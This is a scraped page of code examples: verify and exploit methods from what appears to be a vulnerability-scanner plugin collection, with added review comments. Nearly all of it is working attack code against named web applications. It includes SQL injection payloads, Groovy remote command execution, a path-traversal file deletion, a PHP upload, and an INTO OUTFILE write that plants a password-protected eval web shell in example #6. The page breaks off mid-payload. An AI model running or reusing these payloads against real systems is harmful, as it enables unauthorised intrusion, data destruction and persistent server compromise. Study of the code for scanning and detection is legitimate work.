예제 #1
    def verify(self) -> None:
        """Time-based blind SQL injection probe against ``self.target``.

        Two POSTs carrying ASP.NET-style form fields (``__VIEWSTATE`` etc.)
        are sent to the target: ``payload1`` is the plain login form and
        ``payload2`` injects ``WAITFOR DELAY '0:0:5'`` into ``txtUserID``.
        Response bodies are discarded; only the wall-clock duration of the
        two requests is compared.  Every exception (including network
        errors) is caught, logged through ``self.output.info`` and swallowed.

        Side effect: ``self.target`` is rewritten in place (see below).
        """
        # Normalise the URL: drop trailing '/' from the target, append '/'
        # and base_path without its leading '/'.  The result is stored back
        # on self.target, so a second call appends base_path again.
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            url = self.target
            # Baseline form submission, no delay clause.
            payload1 = '''__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJNTU4MTMwNTc4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgULY2JJc1JlbWViZXIFDEltYWdlQnV0dG9uMRgx6d11G2zzWntRDJIZph4YGLVfZouvWjmVDOX9030f&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEdAAdHo7ESDfB43eQm%2B%2BaON1gP9Tt6KoVd96dN6zOjIKoOlHY2%2BMc6SrnAqio3oCKbxYaDr609gOYlKV%2BbpnR3q6Cx6ZACrx5RZnllKSerU%2BIuKsmrE4D3DRrem1MsGaBV0yK61SaGzux4XzPTjGFgzHLb%2Fp0Y6tcT3dZFQrnTSmlg62gf3LfDgkRp4YSzbmd%2Bkow%3D&txtUserID=admin&txtPassword=admin&ImageButton1.x=47&ImageButton1.y=3&hidFileldBrowserName=chrome44.0.2403.157&hidFileldBrowserShell=chrome%E6%B5%8F%E8%A7%88%E5%99%A8'''
            # Same form with a 5-second WAITFOR DELAY spliced into txtUserID.
            # NOTE(review): as shown here the triple-quoted literal is broken
            # across several lines; if those breaks exist in the real file
            # the newlines become part of the request body — confirm.
            payload2 = '''__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNTU4MTMwNTc4D2QWAgIDD2QWAgIJDw8WAh4EVGV4dAUb55So5oi35Z
CN5oiW5a+G56CB6ZSZ6K+v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFC2NiSXNSZW1lYmVyBQxJbW
FnZUJ1dHRvbjGUTVIt9MPbBGiuZg4jaDZnl7GGp6LqcBtLSKtVgDP4lw==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARG
ET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAeUy/Z893jBDhlvaCCBA+8t9Tt6KoVd96dN6zOjIKoOlHY2+Mc6SrnAq
io3oCKbxYaDr609gOYlKV+bpnR3q6Cx6ZACrx5RZnllKSerU+IuKsmrE4D3DRrem1MsGaBV0yK61SaGzux4XzPTjGFgzHLb10b6b
QvRNPx/1qIXDYnt2YfQsDSjm01CMQ7LbBqb8j0=&txtUserID=admin';WAITFOR DELAY '0:0:5'--&txtPassword=admin&I
mageButton1.x=47&ImageButton1.y=3&hidFileldBrowserName=chrome44.0.2403.157&hidFileldBrowserShell=chr
ome%E6%B5%8F%E8%A7%88%E5%99%A8'''
            start_time = time.time()
            # No timeout is set on either request; a hung target blocks here.
            _response = requests.post(url, data=payload1)
            end_time1 = time.time()
            _response = requests.post(url, data=payload2)
            end_time2 = time.time()
            # NOTE(review): this computes baseline duration MINUS delayed
            # duration, the reverse of the other timing checks on this page
            # (which compute delayed minus baseline).  As written it fires
            # only when the *baseline* request is more than 5 s slower —
            # confirm which order is intended.  Detection side: two POSTs to
            # the same login path seconds apart, the second containing a
            # WAITFOR DELAY clause, are the visible server-side artefact.
            if (end_time1-start_time) - (end_time2-end_time1) > 5:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常:{}'.format(e))
    def verify(self) -> None:
        """Probe for server-side script execution via a ``_search`` request.

        Posts a JSON body to ``{target}/website/blog/`` (response unused),
        then posts a ``script_fields`` query with ``"lang": "groovy"`` to
        ``{target}/_search?pretty``.  The script calls ``Runtime.exec("id")``
        on the server, so a match means an OS command actually ran there.
        The vulnerability is reported when the response body contains all
        of ``uid``, ``gid`` and ``groups`` (the shape of ``id`` output).
        Exceptions are logged and swallowed.  ``self.target`` is rewritten
        in place.
        """
        # Join base_path onto the target; stored back, so repeated calls
        # append base_path repeatedly.
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Sent as a raw string (form-encoded by default, no JSON header).
            # Its purpose is not evident from this block and r1 is never read.
            data1 = '''{"name": "csancsan"}'''
            r1 = requests.post(
                '{target}/website/blog/'.format(target=self.target), data=data1)

            head = {
                'User-Agent': 'Mozilla/5.0',
                'Content-Type': 'application/json'
            }
            # Groovy script field that executes the `id` command server-side.
            # Presumably an Elasticsearch-style endpoint (the `_search` path
            # and `lang: groovy` suggest it) — not verifiable from here.
            payload = {"size": 1, "script_fields": {"lupin": {
                "lang": "groovy", "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

            r2 = requests.post('{target}/_search?pretty'.format(
                target=self.target), headers=head, data=json.dumps(payload))
            # print(r2.text)
            # Marker check: `id` output contains uid=, gid= and groups=.
            # Defender note: a `_search` request carrying script_fields with
            # Runtime/exec in the body is the artefact to alert on.
            if 'uid' in r2.text and 'gid' in r2.text and 'groups' in r2.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #3
    def verify(self) -> None:
        """Three-step probe: delete a log file, trigger a login, read the log.

        Step 1 issues a GET to ``picup.php`` with ``action=del`` and a
        traversal path ``../data/log/passlog.php`` — this is destructive: it
        asks the target to delete that file.  Step 2 posts a login form with
        masked credentials.  Step 3 fetches ``data/log/passlog.php`` and
        reports the vulnerability when a fixed MD5 digest appears in it.
        Exceptions are logged and swallowed.  ``self.target`` is rewritten
        in place.
        """
        # Join base_path onto the target; stored back, so repeated calls
        # append base_path repeatedly.  If base_path is empty the target
        # ends with '/', and the '%s/...' URLs below gain a double slash.
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            url = self.target
            # del passlog — destructive: path traversal deletes the target's
            # log file before the next step writes to it.
            del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url
            requests.get(del_url)
            # submit code — the credentials are masked placeholders, so as
            # written the literal asterisks are what gets posted.
            login_url = '%s/login.php?action=login&lonadmin=1' % url
            login_data = {
                'loginuser': '******',
                'loginpass': '******'
            }
            requests.post(login_url, data=login_data)
            # return page — the log file itself is fetched over HTTP, so a
            # readable data/log/ directory is part of what this confirms.
            verify_url = '%s/data/log/passlog.php' % url
            content = requests.get(verify_url).text
            if 'cfcd208495d565ef66e7dff9f98764da' in content:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #4
    def verify(self) -> None:
        """Unrestricted-upload probe against ``/maxImageUpload/index.php``.

        Uploads ``1.php`` (declared as ``image/jpeg``) whose body echoes an
        MD5 digest and then ``unlink``s itself, then fetches
        ``/maxImageUpload/original/1.php`` and looks for the digest.  The
        uploaded file is self-deleting, but it is still executed on the
        target if the upload succeeds.  Exceptions are logged and
        swallowed.  ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            # Both paths start with '/', so urljoin replaces the whole path
            # of `arg`: any base_path joined above is discarded here.
            testurl = urllib.parse.urljoin(arg,
                                           '/maxImageUpload/original/1.php')
            vulurl = urllib.parse.urljoin(arg, '/maxImageUpload/index.php')

            # Multipart file field: PHP source sent with an image MIME type.
            payload = {
                'myfile':
                ('1.php', '<?php echo md5(0x2333333);unlink(__FILE__);?>',
                 'image/jpeg')
            }
            data = {'submitBtn': 'Upload'}

            # Upload response is evaluated for .text and discarded.
            requests.post(vulurl, files=payload, data=data).text
            resp = requests.get(testurl)
            # NOTE(review): `resp` is the Response object, not `resp.text`
            # as in the other examples on this page; the substring test is
            # applied to the object rather than the body — confirm intended.
            if '5a8adb32edd60e0cfb459cfb38093755' in resp:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #5
    def verify(self) -> None:
        """SQL-to-file write probe via ``print_addfeelog.php``.

        Posts a base64 ``all_sql`` parameter (the decoded SQL is given in the
        comment below) that, per that comment, uses ``INTO OUTFILE`` to
        write a PHP file under the web root — a persistent, destructive
        change on the target.  It then fetches the written file and reports
        when ``md5('c')`` (``4a8a08f0…``) appears in the body.  Exceptions
        are logged and swallowed.  ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # The payload path depends on the actual deployment.
            # select '<?php echo md5(c)?>c' into outfile '/var/eyou/apache/htdocs/php/bill/script/index.php';
            payload = '/php/bill/print_addfeelog.php'
            headers = {'Cookie': 'cookie=1;'}
            # Base64 of the SQL quoted in the comment above (per that comment).
            data = 'all_sql=c2VsZWN0ICc8P3BocCBlY2hvIG1kNShjKT8+YycgaW50byBvdXRmaWxlICcvdmFyL2V5b3UvYXBhY2hlL2h0ZG9jcy9waHAvYmlsbC9zY3JpcHQvaW5kZXgucGhwJzs='
            url = self.target + payload
            requests.post(url, headers=headers, data=data)
            # NOTE(review): this appends the *filesystem* path from the SQL
            # to the URL; whether it resolves depends on the target's
            # document root layout — confirm against a known instance.
            verify_url = self.target + '/var/eyou/apache/htdocs/php/bill/script/index.php'
            r = requests.get(verify_url)

            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #6
    def exploit(self) -> None:
        """Exploit variant of the ``print_addfeelog.php`` file-write probe.

        Same flow as the ``verify`` example above, but the SQL in the
        comment below writes a file containing ``eval($_POST[c])`` — i.e.
        it leaves a persistent web shell on the target.  The report message
        itself states the shell URL and asks the operator to delete it
        promptly; this should only ever run against systems you own or are
        authorised to test.  Exceptions are logged and swallowed.
        ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # The payload path depends on the actual deployment.
            # select '<?php echo md5(c); eval($_POST[c])?>c' into outfile '/var/eyou/apache/htdocs/php/bill/script/index.php';
            payload = '/php/bill/print_addfeelog.php'
            headers = {'Cookie': 'cookie=1;'}
            # Base64 of the SQL quoted in the comment above (per that comment).
            data = 'all_sql=c2VsZWN0ICc8P3BocCBlY2hvIG1kNShjKTsgZXZhbCgkX1BPU1RbY10pPz5jJyBpbnRvIG91dGZpbGUgJy92YXIvZXlvdS9hcGFjaGUvaHRkb2NzL3BocC9iaWxsL3NjcmlwdC9pbmRleC5waHAnOw=='
            url = self.target + payload
            requests.post(url, headers=headers, data=data)
            # NOTE(review): appends the filesystem path from the SQL to the
            # URL; resolvability depends on the target's docroot — confirm.
            verify_url = self.target + '/var/eyou/apache/htdocs/php/bill/script/index.php'
            r = requests.get(verify_url)

            # md5('c') marker means the written file executed.
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.
                    format(target=self.target,
                           name=self.vuln.name,
                           url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #7
    def verify(self) -> None:
        """Time-based blind SQL injection probe on ``?m=im&a=getDayRecord``.

        Posts a baseline ``UNION SELECT`` body and then the same body with
        ``sleep(10)`` in the first column, measuring each request.  Reports
        when the delayed request took more than 9 s longer than the
        baseline.  Responses are not inspected.  Exceptions are logged and
        swallowed.  ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            payload = "/?m=im&a=getDayRecord"
            url = self.target + payload
            # 40-column UNION; only the first column differs (sleep vs 1).
            data_sleep = "user_id=1' and 1=2 UNION SELECT sleep(10),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40#"
            data_normal = "user_id=1' and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40#"
            time_start = time.time()
            # No timeout on either request; a hung target blocks here.
            requests.post(url, data=data_normal)
            time_end_normal = time.time()
            requests.post(url, data=data_sleep)
            time_end_sleep = time.time()

            # delayed duration minus baseline duration; network jitter is
            # the main false-positive source since there is a single sample.
            if (time_end_sleep - time_end_normal) - (time_end_normal -
                                                     time_start) > 9:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #8
    def verify(self) -> None:
        """Time-based SQL injection probe on ``sam-ajax-admin.php``.

        Posts a baseline ``load_posts`` request and then one whose ``cstr``
        parameter carries ``SLEEP(5)``.  Reports when either response has
        status 200 and the second request took more than 5 s longer than
        the first.  Exceptions are logged and swallowed.  ``self.target``
        is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            # No leading '/': the join below relies on self.target already
            # ending with '/' (true only when base_path is empty or ends
            # with a slash).
            payload = 'wp-content/plugins/simple-ads-manager/sam-ajax-admin.php'
            url = arg + payload
            post_data1 = 'action=load_posts&cstr==1&sp=Post&spg=Page'
            post_data2 = 'action=load_posts&cstr==1%27)%20AND%20SLEEP(5)%20AND%20(%27WhYm%27=%27WhYm&sp=Post&spg=Page'
            start_time1 = time.time()

            # No timeout on either request.
            req1 = requests.post(url, data=post_data1)
            end_time1 = time.time()
            _req2 = requests.post(url, data=post_data2)
            # (delayed duration) - (baseline duration) > 5, gated on a 200
            # from at least one of the two responses.
            if (req1.status_code == 200 or _req2.status_code == 200) and (
                (time.time() - end_time1) - (end_time1 - start_time1)) > 5:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #9
    def verify(self) -> None:
        """Stored-XSS probe against a FrogCMS admin page-edit endpoint.

        Replays a hard-coded cookie jar to ``admin/?/page/edit/3`` with a
        form body whose ``keywords`` field contains
        ``<script>confirm(1234)</script>``, then fetches ``/?about_us`` and
        reports if that script tag is echoed back.  This is a persistent
        change: page 3's keywords on the target are overwritten.  The cookie
        values (``PHPSESSID``, ``csrf_token``, ``frog_auth_user``) are bound
        to one particular session and presumably came from the author's
        test instance — they will not authenticate against an arbitrary
        target.  Exceptions are logged and swallowed.  ``self.target`` is
        rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Hard-coded install directory and page id.
            payload = '/FrogCMS-master/admin/?/page/edit/3'
            # Register a user first.
            # Obtain cookies
            cookies = {}
            raw_cookies = 'current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e'
            # Splitting on ';' alone leaves the leading space on every key
            # after the first (the separators are '; ').
            for line in raw_cookies.split(';'):
                key, value = line.split('=', 1)  # maxsplit=1: split once, two parts
                cookies[key] = value
            #print (cookies)
            # Form body; the XSS marker lives in page[keywords].
            data = 'page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close'
            url = self.target + payload
            requests.post(url, cookies=cookies, data=data)

            verify_url = self.target + '/FrogCMS-master/?about_us'
            r = requests.get(verify_url)

            # Exact-string match of the injected tag in the rendered page.
            if "<script>confirm(1234)</script>" in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #10
    def verify(self) -> None:
        """Code-injection probe via ``admin.php?c=syscontroller&m=add``.

        Posts a controller-creation form whose ``name`` field is
        ``myndtt*/phpinfo();/*``, then requests
        ``/index.php?c=myndtt&m=index`` and reports when the body looks like
        ``phpinfo()`` output (``PHP Version`` and ``System``).  If it
        succeeds this leaves a new controller on the target — a persistent
        change.  As written ``cookies`` is an empty dict, so the admin
        request is sent unauthenticated; the commented block shows how the
        author populated it.  Exceptions are logged and swallowed.
        ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Register an account and log in first, then visit:
            # Obtain cookies
            cookies = {}
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            payload = "/admin.php?c=syscontroller&m=add&post=1"
            # The `*/ ... /*` in data[name] closes and reopens a comment in
            # the generated controller source (as the check below assumes).
            data = "data%5Bname%5D=myndtt*/phpinfo();/*&data%5Bcname%5D=myndtt&app=0&data%5Btype%5D%5B%5D=0&data%5Bmeta_title%5D=1234&data%5Bmeta_keywords%5D=123&data%5Bmeta_descrintion%5D=123"
            url = self.target + payload
            requests.post(url, cookies=cookies, data=data)

            verify_url = self.target + '/index.php?c=myndtt&m=index'
            r = requests.get(verify_url)

            # Two phpinfo() markers must both be present.
            if 'PHP Version' in r.text and 'System' in r.text:
                self.output.report(
                    self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                        target=self.target,
                        name=self.vuln.name,
                        url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #11
    def verify(self) -> None:
        """Time-based SQL injection probe on ``/hdwiki/index.php?pic-search``.

        Posts a baseline ``searchtext`` body and then one containing
        ``sleep(10)``, and reports when the second request took more than
        9 s longer than the first.  Responses are not inspected.  Exceptions
        are logged and swallowed.  ``self.target`` is rewritten in place.
        """
        # Join base_path onto the target (stored back; repeated calls
        # append base_path repeatedly).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # NOTE(review): the literal starts with a space, so `url` below
            # contains "<target> /hdwiki/..." — confirm this is intentional.
            payload = ' /hdwiki/index.php?pic-search'
            # NOTE(review): `headers` is built but never passed to either
            # requests.post() call below.
            headers = {
                'User-Agent':
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36',
            }
            data_sleep = "searchtext=%E7%9B%B8%e9%8c%a6'  UNION SELECT if(user()=user(),sleep(10),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7"
            data_normal = "searchtext=%E7%9B%B8%e9%8c%a6'  UNION SELECT if(user()=user(),md5(c),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7"
            url = self.target + payload
            time_start = time.time()
            # No timeout on either request.
            requests.post(url, data=data_normal)
            time_end_normal = time.time()
            requests.post(url, data=data_sleep)
            time_end_sleep = time.time()

            # delayed duration minus baseline duration, single sample.
            if (time_end_sleep - time_end_normal) - (time_end_normal -
                                                     time_start) > 9:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
예제 #12
 def verify(self) -> None:
     """Boolean-based SQL injection probe on ``memberSurveyAction!answerQuestion.do``.

     Sends two otherwise identical survey submissions whose
     ``answerList[3].optionValue`` differs only in a trailing condition
     (``'Pesh'='Pesh`` — true — versus ``'Pesh'='hyhmnn`` — false) and
     reports when the two response bodies differ.  The headers carry a
     hard-coded ``JSESSIONID`` and a fixed ``Content-Length``.  Exceptions
     are logged and swallowed.  ``self.target`` is rewritten in place.
     """
     # Join base_path onto the target (stored back; repeated calls
     # append base_path repeatedly).
     self.target = self.target.rstrip('/') + '/' + (
         self.get_option('base_path').lstrip('/'))
     try:
         self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
             target=self.target, vuln=self.vuln))
         url = self.target + "/web/member/memberSurveyAction!answerQuestion.do"
         # NOTE(review): Content-Length is hard-coded to 2916; whether
         # requests keeps or overrides a caller-supplied Content-Length
         # should be confirmed — a mismatch would corrupt the request.
         # The JSESSIONID value is specific to one captured session.
         headers = {
             "Content-Length": "2916",
             "Content-Type": "application/x-www-form-urlencoded",
             "X-Requested-With": "XMLHttpRequest",
             "Cookie":
             "JSESSIONID=ADEB3C74B5159E2AC9A0AB6AC0C1050C-n1.jvm1; pvndwvyk=1",
             "Connection": "Keep-alive",
             "Accept-Encoding": "gzip,deflate",
             "User-Agent":
             "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36",
             "Accept": "*/*"
         }
         # NOTE(review): as shown here each string literal below is broken
         # across two lines; if that break exists in the real file it is a
         # syntax error — presumably a rendering wrap of one long line.
         # True-condition body ('Pesh'='Pesh').
         payload = "answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND 'Pesh'='Pesh&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOption
Id=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&[email protected]&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F"
         # False-condition body ('Pesh'='hyhmnn'); everything else identical.
         payload1 = "answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND 'Pesh'='hyhmnn&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOpt
